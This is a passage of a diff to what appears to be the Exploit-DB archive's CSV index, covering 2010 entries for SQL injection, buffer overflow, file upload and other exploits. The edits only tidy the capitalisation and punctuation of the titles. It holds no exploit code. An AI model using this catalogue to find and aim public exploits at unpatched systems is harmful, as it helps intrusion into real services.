Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - LFI Vulnerability",2010-01-30,kaMtiEz,php,webapps,0 11291,platforms/hardware/dos/11291.txt,"Xerox Workcenter 4150 Remote Buffer Overflow",2010-01-30,"Francis Provencher",hardware,dos,0 @@ -10342,7 +10342,7 @@ id,file,description,date,author,platform,type,port 11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,N/A,asp,webapps,0 11296,platforms/php/webapps/11296.txt,"ThinkAdmin (page.php) SQL Injection Vulnerability",2010-01-30,"AtT4CKxT3rR0r1ST ",php,webapps,0 11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection PoC",2010-01-30,fred777,php,webapps,0 -11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 XSS and Improper Permissions",2010-01-30,h00die,php,webapps,80 +11298,platforms/php/webapps/11298.txt,"dotProject 2.1.3 - XSS and Improper Permissions",2010-01-30,h00die,php,webapps,80 11299,platforms/php/webapps/11299.txt,"crownweb (page.cfm) SQL Injection Vulnerability",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11300,platforms/php/webapps/11300.txt,"Creative SplashWorks-SplashSite (page.php) Blind SQL Injection Vulnerability",2010-01-31,"AtT4CKxT3rR0r1ST ",php,webapps,0 11301,platforms/php/webapps/11301.txt,"Maian Greetings 2.1 - Shell Upload Vulnerability",2010-01-31,indoushka,php,webapps,0 @@ -10374,10 +10374,10 @@ id,file,description,date,author,platform,type,port 11331,platforms/windows/local/11331.txt,"Ipswitch IMAIL 11.01 reversible encryption + weak ACL",2010-02-04,sinn3r,windows,local,0 11332,platforms/windows/dos/11332.pl,"Opera 10.10 Remote Code Execution DoS Exploit",2010-02-05,"cr4wl3r ",windows,dos,0 11333,platforms/windows/local/11333.pl,"FoxPlayer 1.7.0 (.m3u) Local Buffer Overflow Exploit",2010-02-05,"cr4wl3r ",windows,local,0 -11334,platforms/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection vulnerability",2010-02-05,kaMtiEz,php,webapps,0 +11334,platforms/php/webapps/11334.txt,"Audistats 1.3 - SQL Injection Vulnerability",2010-02-05,kaMtiEz,php,webapps,0 11336,platforms/php/webapps/11336.txt,"Open Bulletin Board Multiple Blind SQL Injection Vulnerability",2010-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 11337,platforms/php/webapps/11337.txt,"Joomla (com_photoblog) Blind SQL Injection Vulnerability",2010-02-06,"ALTBTA ",php,webapps,0 -11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory corruption Heap BOF exploit",2010-02-06,TecR0c,windows,dos,0 +11338,platforms/windows/dos/11338.py,"X-lite SIP 3.0 - (wav) memory corruption Heap BOF Exploit",2010-02-06,TecR0c,windows,dos,0 11339,platforms/php/webapps/11339.txt,"Arab Network Tech. (ANT) CMS - SQL Injection",2010-02-06,Tr0y-x,php,webapps,0 11340,platforms/php/webapps/11340.txt,"odlican.net cms 1.5 - Remote File Upload Vulnerability",2010-02-06,anonymous,php,webapps,0 11341,platforms/php/webapps/11341.txt,"ShopEx Single <= 4.5.1 - Multiple Vulnerabilities",2010-02-06,"cp77fk4r ",php,webapps,0 @@ -10389,7 +10389,7 @@ id,file,description,date,author,platform,type,port 11347,platforms/windows/dos/11347.html,"Safari 4.0.4 + Firefox 3.5.7 + SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 (articlemodule) SQL Injection Vulnerability",2010-02-07,"T u R c O",php,webapps,0 -11350,platforms/php/webapps/11350.txt,"Belkatalog CMS SQL Injection Vulnerability",2010-02-07,anonymous,php,webapps,0 +11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection Vulnerability",2010-02-07,anonymous,php,webapps,0 11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 11352,platforms/php/webapps/11352.txt,"Joomla Component com_productbook SQL Injection Vulnerability",2010-02-07,snakespc,php,webapps,0 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple CSRF Vulnerabilities",2010-02-07,"Milos Zivanovic ",php,webapps,0 @@ -10401,16 +10401,16 @@ id,file,description,date,author,platform,type,port 11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Include Vulnerability",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 11360,platforms/php/webapps/11360.txt,"Blue Dove SQL Injection Vulnerability",2010-02-08,"HackXBack ",php,webapps,0 11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure Vulnerability",2010-02-09,"ViRuSMaN ",asp,webapps,0 -11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 Local Buffer Overflow POC (0day)",2010-02-09,"fl0 fl0w",windows,dos,0 +11363,platforms/windows/dos/11363.c,"UltraISO 9.3.6.2750 Local Buffer Overflow PoC (0day)",2010-02-09,"fl0 fl0w",windows,dos,0 11364,platforms/multiple/local/11364.txt,"LDAP Injection PoC",2010-02-09,"mc2_s3lector ",multiple,local,0 11365,platforms/php/webapps/11365.txt,"CPA Site Solutions Remote File Upload Vulnerability",2010-02-09,R3VAN_BASTARD,php,webapps,0 11366,platforms/php/webapps/11366.txt,"Newsletter Tailor Database Backup Dump Vulnerability",2010-02-09,"ViRuSMaN ",php,webapps,0 11367,platforms/php/webapps/11367.txt,"Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability",2010-02-09,"ViRuSMaN ",php,webapps,0 11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,"HackXBack ",php,webapps,0 -11369,platforms/asp/webapps/11369.txt,"MOJO's IWMS <= 7 SQL Injection & Cross Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 +11369,platforms/asp/webapps/11369.txt,"MOJO's IWms <= 7 SQL Injection & Cross Site Scripting",2010-02-09,"cp77fk4r ",asp,webapps,0 11372,platforms/windows/local/11372.c,"UltraISO 9.3.6.2750 Local Buffer Overflow Exploit (0day)",2010-02-09,"fl0 fl0w",windows,local,0 11374,platforms/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,windows,dos,0 -11375,platforms/php/webapps/11375.txt,"Zomorrod Cms SQL Injection Vulnerability",2010-02-09,"Pouya Daneshmand",php,webapps,0 +11375,platforms/php/webapps/11375.txt,"Zomorrod CMS SQL Injection Vulnerability",2010-02-09,"Pouya Daneshmand",php,webapps,0 11376,platforms/php/webapps/11376.txt,"Fonts Site Script Remote File Disclosure Vulnerability",2010-02-09,JIKO,php,webapps,0 11377,platforms/php/webapps/11377.txt,"Limny 1.01 - Remote File Upload Vulnerability",2010-02-09,JIKO,php,webapps,0 11378,platforms/php/webapps/11378.txt,"Newsletter Tailor 0.2.0 - RFI Vulnerability",2010-02-09,snakespc,php,webapps,0 @@ -10422,26 +10422,26 @@ id,file,description,date,author,platform,type,port 11385,platforms/php/webapps/11385.txt,"ULoki Community Forum 2.1 - (usercp.php) XSS Vulnerability",2010-02-10,"Sioma Labs",php,webapps,0 11391,platforms/windows/dos/11391.py,"Open and Compact FTPd 1.2 - Pre-Authentication Crash (PoC)",2010-02-10,loneferret,windows,dos,0 11392,platforms/windows/dos/11392.c,"Radasm 2.2.1.6 - (.rap ) Local Buffer Overflow PoC",2010-02-11,"fl0 fl0w",windows,dos,0 -11393,platforms/jsp/webapps/11393.txt,"Omnidocs SQL injection Vulnerability",2010-02-11,thebluegenius,jsp,webapps,0 +11393,platforms/jsp/webapps/11393.txt,"Omnidocs SQL Injection Vulnerability",2010-02-11,thebluegenius,jsp,webapps,0 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 -11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 +11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3 .x - SQL Injection Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 11397,platforms/php/webapps/11397.txt,"PHP Captcha Security Images DoS Vulnerability",2010-02-11,"cp77fk4r ",php,webapps,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload Vulnerability",2010-02-11,JIKO,php,webapps,0 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook <= 2.0.4 Database Backup Dump Vulnerability",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 -11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 -11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 +11401,platforms/php/webapps/11401.txt,"CD Rentals Script SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 +11402,platforms/php/webapps/11402.txt,"Books/eBooks Rental Software SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 11403,platforms/multiple/webapps/11403.txt,"Cisco Collaboration Server 5 - XSS, Source Code Disclosure",2010-02-11,s4squatch,multiple,webapps,80 11404,platforms/multiple/webapps/11404.txt,"X-Cart Pro 4.0.13 - SQL Injection Proof of Concept",2010-02-11,s4squatch,multiple,webapps,80 11405,platforms/multiple/webapps/11405.txt,"RSA SecurID XSS Vulnerability",2010-02-11,s4squatch,multiple,webapps,80 11406,platforms/windows/webapps/11406.txt,"J.A.G (Just Another Guestbook) 1.14 - Database Disclosure Vulnerability",2010-02-11,Phenom,windows,webapps,80 11407,platforms/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service Vulnerability",2010-02-11,"Beenu Arora",windows,dos,80 -11408,platforms/win32/local/11408.c,"Radasm .rap file local buffer overflow vulnerability",2010-02-11,"fl0 fl0w",win32,local,0 +11408,platforms/win32/local/11408.c,"Radasm .rap file local Buffer Overflow Vulnerability",2010-02-11,"fl0 fl0w",win32,local,0 11409,platforms/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection Vulnerability",2010-02-11,JaMbA,multiple,webapps,80 11410,platforms/php/webapps/11410.txt,"Vacation Rental Script SQL Injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 11411,platforms/php/webapps/11411.txt,"apemCMS SQL Injection Vulnerability",2010-02-11,Ariko-Security,php,webapps,0 -11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 +11412,platforms/php/webapps/11412.txt,"Trade Manager Script SQL Injection Vulnerability",2010-02-11,JaMbA,php,webapps,0 11413,platforms/windows/local/11413.pl,"CastRipper 2.50.70 (.asx) Playlist Stack Overflow Exploit",2010-02-12,"Jordi Chancel",windows,local,0 11414,platforms/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,asp,webapps,0 11415,platforms/php/webapps/11415.txt,"Izumi <= 1.1.0 (RFI/LFI) Multiple Include Vulnerability",2010-02-12,"cr4wl3r ",php,webapps,0 @@ -10484,7 +10484,7 @@ id,file,description,date,author,platform,type,port 11464,platforms/php/webapps/11464.txt,"Joomla Component com_hdvideoshare SQL Injection Vulnerability",2010-02-15,snakespc,php,webapps,0 11465,platforms/windows/local/11465.py,"Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit",2010-02-15,_SuBz3r0_,windows,local,0 11466,platforms/php/webapps/11466.txt,"microUpload Shell Upload Vulnerability",2010-02-15,Phenom,php,webapps,0 -11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote 0day DoS Exploit",2010-02-15,"Jason Bowes",ios,dos,0 +11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote DoS Exploit (0day)",2010-02-15,"Jason Bowes",ios,dos,0 11468,platforms/windows/remote/11468.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF",2010-02-15,dookie,windows,remote,21 11469,platforms/windows/dos/11469.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 11470,platforms/windows/dos/11470.py,"Easy~Ftp Server 1.7.0.2 - Post-Authentication BoF (PoC)",2010-02-15,loneferret,windows,dos,0 @@ -10518,7 +10518,7 @@ id,file,description,date,author,platform,type,port 11500,platforms/windows/remote/11500.py,"Easy~Ftp Server 1.7.0.2 - (HTTP) Remote BoF Exploit",2010-02-18,"ThE g0bL!N",windows,remote,0 11502,platforms/php/webapps/11502.txt,"phpAutoVideo CSRF Vulnerability",2010-02-19,GoLdeN-z3r0,php,webapps,0 11503,platforms/php/webapps/11503.txt,"Litespeed Web Server 4.0.12 - (Add Admin) CSRF and XSS Vulnerabilities",2010-02-19,d1dn0t,php,webapps,0 -11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL injection vulnerability",2010-02-19,Ariko-Security,php,webapps,0 +11504,platforms/php/webapps/11504.txt,"Amelia CMS - SQL Injection Vulnerability",2010-02-19,Ariko-Security,php,webapps,0 11507,platforms/php/webapps/11507.txt,"WSC CMS (Bypass) SQL Injection Vulnerability",2010-02-19,Phenom,php,webapps,0 11508,platforms/php/webapps/11508.txt,"Trixbox 2.2.4 - PhonecDirectory.php SQL Injection",2010-02-19,NorSlacker,php,webapps,0 11509,platforms/php/webapps/11509.txt,"Phpkit 1.6.1 - Multiple SQL Injection Vulnerabilities",2010-02-19,"Easy Laster",php,webapps,0 @@ -10528,7 +10528,7 @@ id,file,description,date,author,platform,type,port 11517,platforms/php/webapps/11517.txt,"Netzbrett Database Disclosure Vulnerability",2010-02-20,"ViRuSMaN ",php,webapps,0 11518,platforms/php/webapps/11518.txt,"Softbiz Jobs (news_desc) SQL Injection Vulnerability",2010-02-22,BAYBORA,php,webapps,0 11519,platforms/php/webapps/11519.txt,"Ac4p.com Gallery 1.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 -11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Dos Exploit",2010-02-22,Ale46,ios,dos,0 +11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote DoS Exploit",2010-02-22,Ale46,ios,dos,0 11521,platforms/php/webapps/11521.txt,"Ero Auktion 2.0 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 11522,platforms/php/webapps/11522.txt,"Ero Auktion 2010 - (news.php) SQL Injection Vulnerability",2010-02-22,"Easy Laster",php,webapps,0 11523,platforms/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps,0 @@ -10638,7 +10638,7 @@ id,file,description,date,author,platform,type,port 11641,platforms/php/webapps/11641.txt,"phpCOIN 1.2.1 (mod.php) LFI Vulnerability",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11644,platforms/multiple/dos/11644.py,"Flare <= 0.6 - Local Heap Overflow DoS",2010-03-06,l3D,multiple,dos,0 -11646,platforms/php/webapps/11646.pl,"BigForum Version: 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 +11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 @@ -10646,32 +10646,32 @@ id,file,description,date,author,platform,type,port 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0 -11656,platforms/windows/local/11656.py,"QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 +11656,platforms/windows/local/11656.py,"QuickZip 4.x - (.zip) Local Universal Buffer Overflow PoC Exploit (0day)",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 - Local File Include Vulnerability",2010-03-08,"cr4wl3r ",php,webapps,0 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0 11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0 -11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0 +11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent 1.0 - SQL Injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0 11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote BoF (MSF Module)",2010-03-09,blake,windows,remote,0 11669,platforms/windows/dos/11669.py,"JAD java decompiler 1.5.8g (argument) Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g (.class) Stack Overflow DoS",2010-03-09,l3D,windows,dos,0 11671,platforms/php/webapps/11671.txt,"mhproducts kleinanzeigenmarkt search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 -11672,platforms/php/webapps/11672.txt,"Wild CMS SQL injection vulnerability",2010-03-09,Ariko-Security,php,webapps,0 +11672,platforms/php/webapps/11672.txt,"Wild CMS SQL Injection Vulnerability",2010-03-09,Ariko-Security,php,webapps,0 11674,platforms/php/webapps/11674.txt,"nus newssystem 1.02 - (id) SQL Injection Vulnerability",2010-03-09,n3w7u,php,webapps,0 11676,platforms/php/webapps/11676.txt,"Campsite 3.3.5 - CSRF Vulnerability",2010-03-10,"pratul agrawal",php,webapps,0 11677,platforms/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection Vulnerability",2010-03-10,"Yaniv Miron",hardware,webapps,0 11678,platforms/php/webapps/11678.txt,"PhpCityPortal Multiple Vulnerabilities",2010-03-10,R3d-D3V!L,php,webapps,0 11679,platforms/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script (search_result.php) SQL Injection Vulnerability",2010-03-10,"Easy Laster",php,webapps,0 -11680,platforms/php/webapps/11680.txt,"Anantasoft Gazelle CMS CSRF Vulnerability",2010-03-10,"pratul agrawal",php,webapps,0 +11680,platforms/php/webapps/11680.txt,"Anantasoft Gazelle CMS - CSRF Vulnerability",2010-03-10,"pratul agrawal",php,webapps,0 11681,platforms/php/webapps/11681.txt,"ispCP Omega <= 1.0.4 - Remote File Include Vulnerability",2010-03-10,"cr4wl3r ",php,webapps,0 11682,platforms/windows/local/11682.py,"Mini-stream Ripper 3.0.1.1 (.m3u) HREF Buffer Overflow",2010-03-10,l3D,windows,local,0 11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)",2010-03-10,Trancer,windows,remote,0 11684,platforms/php/webapps/11684.txt,"Joomla com_about Remote SQL Injection Vulnerability",2010-03-11,snakespc,php,webapps,0 11685,platforms/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross Site Scripting",2010-03-11,ITSecTeam,php,webapps,0 11686,platforms/php/webapps/11686.txt,"ANE CMD CRSF - Add Admin",2010-03-11,"pratul agrawal",php,webapps,0 -11687,platforms/php/webapps/11687.txt,"ANE CMS 1 Persistent XSS Vulnerability",2010-03-11,"pratul agrawal",php,webapps,0 +11687,platforms/php/webapps/11687.txt,"ANE CMS 1- Persistent XSS Vulnerability",2010-03-11,"pratul agrawal",php,webapps,0 11688,platforms/php/webapps/11688.txt,"Joomla Component com_blog SQL Injection Vulnerability",2010-03-11,"DevilZ TM",php,webapps,0 11689,platforms/php/webapps/11689.txt,"Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection Vulnerability",2010-03-11,"Easy Laster",php,webapps,0 11691,platforms/php/webapps/11691.txt,"Joomla com_products 'intCategoryId' Remote SQL Injection Vulnerability",2010-03-11,N2n-Hacker,php,webapps,0 @@ -10686,22 +10686,22 @@ id,file,description,date,author,platform,type,port 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL injection",2010-03-12,"Yakir Wizman",php,webapps,0 11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script news.php - (id) SQL Injection Vulnerability",2010-03-12,"Easy Laster",php,webapps,0 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial of Service Vulnerability",2010-03-12,kingcope,multiple,dos,0 -11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader (.stats file) stack buffer Overflow PoC",2010-03-12,ITSecTeam,windows,dos,0 +11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader (.stats file) Stack Buffer Overflow PoC",2010-03-12,ITSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla Component com_sbsfile Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 11709,platforms/php/webapps/11709.txt,"Joomla Component com_comp SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11710,platforms/php/webapps/11710.php,"Joomla Component com_races Blind SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 -11711,platforms/php/webapps/11711.txt,"Azeno CMS SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 +11711,platforms/php/webapps/11711.txt,"Azeno CMS - SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11713,platforms/windows/local/11713.pl,"Yahoo Player 1.0 - (.m3u) Buffer Overflow Exploit",2010-03-13,Bombard,windows,local,0 -11714,platforms/windows/dos/11714.py,"Mackeitone Media Player (.m3u file) stack buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 +11714,platforms/windows/dos/11714.py,"Mackeitone Media Player (.m3u file) Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black index.php SQL Injection",2010-03-13,"Easy Laster",php,webapps,0 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection Vulnerability",2010-03-13,Ctacok,php,webapps,0 11719,platforms/php/webapps/11719.txt,"Mambo Component com_mambads SQL Injection Vulnerability",2010-03-13,Dreadful,php,webapps,0 -11720,platforms/linux/remote/11720.py,"MicroWorld eScan Antivirus < 3.x Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 +11720,platforms/linux/remote/11720.py,"MicroWorld eScan Antivirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0 -11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express <= 3.01 Remote Code Execution/Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 +11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express <= 3.01 - Remote Code Execution/Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection Vulnerability",2010-03-14,N2n-Hacker,php,webapps,0 11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability",2010-03-14,Inj3ct0r,php,webapps,0 @@ -10728,7 +10728,7 @@ id,file,description,date,author,platform,type,port 11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 Upload Vulnerability",2010-03-15,EL-KAHINA,php,webapps,0 11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability",2010-03-15,indoushka,php,webapps,0 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload Vulnerability",2010-03-15,indoushka,php,webapps,0 -11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Overflow Exploit",2010-03-15,mr_me,windows,remote,0 +11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote Overflow Exploit (0day)",2010-03-15,mr_me,windows,remote,0 11752,platforms/php/webapps/11752.txt,"Joomla com_org SQL Injection Vulnerability (letter parameter)",2010-03-15,kazuya,php,webapps,0 11754,platforms/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 11755,platforms/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion Vulnerabilities",2010-03-15,NoGe,php,webapps,0 @@ -10754,7 +10754,7 @@ id,file,description,date,author,platform,type,port 11776,platforms/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps,0 11777,platforms/php/webapps/11777.txt,"egroupware 1.6.002 and egroupware premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11778,platforms/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 -11779,platforms/windows/local/11779.pl,"Windisc 1.3 - Stack BOF exploit",2010-03-16,Rick2600,windows,local,0 +11779,platforms/windows/local/11779.pl,"Windisc 1.3 - Stack BOF Exploit",2010-03-16,Rick2600,windows,local,0 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF Vulnerability",2010-03-17,"pratul agrawal",php,webapps,0 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF Vulnerability",2010-03-17,"pratul agrawal",php,webapps,0 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include SQL Injection Vulnerability",2010-03-17,"DevilZ TM",php,webapps,0 @@ -10764,26 +10764,26 @@ id,file,description,date,author,platform,type,port 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection Vulnerability",2010-03-17,"Core Security",windows,local,0 11787,platforms/windows/local/11787.py,"Adobe Reader PDF LibTiff Integer Overflow Code Execution",2010-03-17,villy,windows,local,0 11788,platforms/php/webapps/11788.txt,"PHP-Nuke ratedownload SQL Injection",2010-03-17,ITSecTeam,php,webapps,0 -11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN Local buffer overflow",2010-03-17,n00b,multiple,local,0 +11789,platforms/multiple/local/11789.c,"VariCAD 2010-2.05 EN Local Buffer overflow",2010-03-17,n00b,multiple,local,0 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 -11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 +11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 11793,platforms/jsp/webapps/11793.txt,"Manage Engine Service Desk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 11794,platforms/windows/local/11794.c,"MediaCoder 